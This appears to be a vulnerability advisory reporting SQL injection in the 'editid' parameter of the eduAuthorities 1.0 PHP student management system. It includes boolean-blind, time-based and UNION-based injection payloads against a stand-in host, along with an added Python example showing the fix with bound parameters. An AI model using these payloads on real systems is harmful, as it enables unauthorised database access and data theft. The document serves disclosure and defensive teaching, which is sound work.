## Title: eduAuthorities-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 07/29/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `editid` parameter appears to be vulnerable to SQL injection attacks. The payloads `15750083 or 4189=04189` and `58006253 or 7709=7710` were each submitted in the `editid` parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Additionally, the payload `(select*from(select(sleep(20)))a)` was submitted in the `editid` parameter. The application took 20011 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The attacker can get all information from the system by using this vulnerability!
STATUS: HIGH Vulnerability
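The boolean differential described above, next to the fix that removes it. This is an added example, not code from the application or from the advisory's author: the table and column names are hypothetical, and an in-memory SQLite database stands in for the application's MySQL backend.

```python
import re
import sqlite3

# Constructed stand-in for the application's database; the table and column
# names are hypothetical, and SQLite replaces MySQL so the example runs offline.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE class_detail (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO class_detail VALUES (?, ?)",
                   [(1, "Math"), (2, "Physics"), (3, "History")])
    return db

QUERY = "SELECT id, name FROM class_detail WHERE id = "

def lookup_concatenated(db, editid):
    # Unsafe pattern: the request parameter becomes part of the SQL text,
    # so "or 4189=04189" is parsed as a condition, not as a value.
    return db.execute(QUERY + editid).fetchall()

def lookup_bound(db, editid):
    # Hardened pattern: accept only a short run of ASCII digits, then pass
    # the value as a bound parameter so it can never alter the statement.
    if not re.fullmatch(r"[0-9]{1,10}", editid):
        return []
    return db.execute(QUERY + "?", (int(editid),)).fetchall()

# The two boolean probes quoted in the Description.
PROBE_TRUE = "15750083 or 4189=04189"
PROBE_FALSE = "58006253 or 7709=7710"

def responses_differ(lookup, db):
    # The scanner's signal: a true and a false condition give different output.
    return lookup(db, PROBE_TRUE) != lookup(db, PROBE_FALSE)

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", responses_differ(lookup_concatenated, db))
    print("bound:       ", responses_differ(lookup_bound, db))
    print("legitimate id 2:", lookup_bound(db, "2"))
```

In the PHP application the same change means validating `editid` as an integer and passing it through a prepared statement with a bound parameter.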
[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488 OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)# UiVZfrom(select(sleep(3)))a)
Type: UNION query
Title: MySQL UNION query (random number) - 3 columns
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962 UNION ALL SELECT 8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)
---
```
## Reproduce:
[href](https://www.patreon.com/posts/eduauthorities-1-109562178)
## More:
[href](https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)
## Time spent:
00:37:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>